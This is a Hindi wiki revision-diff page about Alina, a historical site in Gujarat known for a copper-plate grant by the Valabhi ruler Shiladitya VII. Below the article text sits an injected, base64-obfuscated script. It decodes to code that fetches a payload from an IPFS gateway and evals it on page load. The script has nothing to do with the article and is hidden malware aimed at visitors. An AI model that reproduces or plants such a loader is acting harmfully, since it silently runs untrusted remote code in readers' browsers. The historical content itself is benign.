Difference between revisions of "अलिना गुजरात"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*बलभिराज ध्रुवभट्टशीलादित्य सप्तम का एक ताम्रदान-प...' के साथ नया पन्ना बनाया)
 
Line 1: Line 1:
*बलभिराज ध्रुवभट्टशीलादित्य सप्तम का एक ताम्रदान-पट्ट इस स्थान से प्राप्त हुआ था।
+
'''अलिना''' [[गुजरात]] का [[ऐतिहासिक स्थान]] है। बलभिराज ध्रुवभट्ट शीलादित्य सप्तम का एक ताम्रदान-पट्ट इस स्थान से प्राप्त हुआ था, जिसमें उनके द्वारा श्वेतक-अहार- वर्तमान [[कैरा]] में स्थित महिलाभिग्राम का [[ब्राह्मण|ब्राह्मणों]] को पंचयज्ञ के प्रयोजनार्थ दान में दिए जाने का उल्लेख है।
*जिसमें उनके द्वारा श्वेतक-अहार- वर्तमान कैरा में स्थित महिलाभिग्राम का [[ब्राह्मण|ब्राह्मणों]] को पंचयज्ञ के प्रयोजनार्थ दान में दिए जाने का उल्लेख है।
 
  
 
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
 
{{लेख प्रगति|आधार=आधार1|प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}
 
{{संदर्भ ग्रंथ}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
==बाहरी कड़ियाँ==
 
 
 
==संबंधित लेख==
 
==संबंधित लेख==
 
[[Category:ऐतिहासिक_स्थान_कोश]]
 
[[Category:ऐतिहासिक_स्थान_कोश]]
Line 18: Line 11:
 
[[Category:गुजरात_के_धार्मिक_स्थल]]
 
[[Category:गुजरात_के_धार्मिक_स्थल]]
 
[[Category:गुजरात]]
 
[[Category:गुजरात]]
 
 
__INDEX__
 
__INDEX__

Revision as of 10:18, 27 August 2012

alina gujarat ka aitihasik sthan hai. balabhiraj dhruvabhatt shiladity saptam ka ek tamradan-patt is sthan se prapt hua tha, jisamean unake dvara shvetak-ahar- vartaman kaira mean sthit mahilabhigram ka brahmanoan ko panchayajn ke prayojanarth dan mean die jane ka ullekh hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh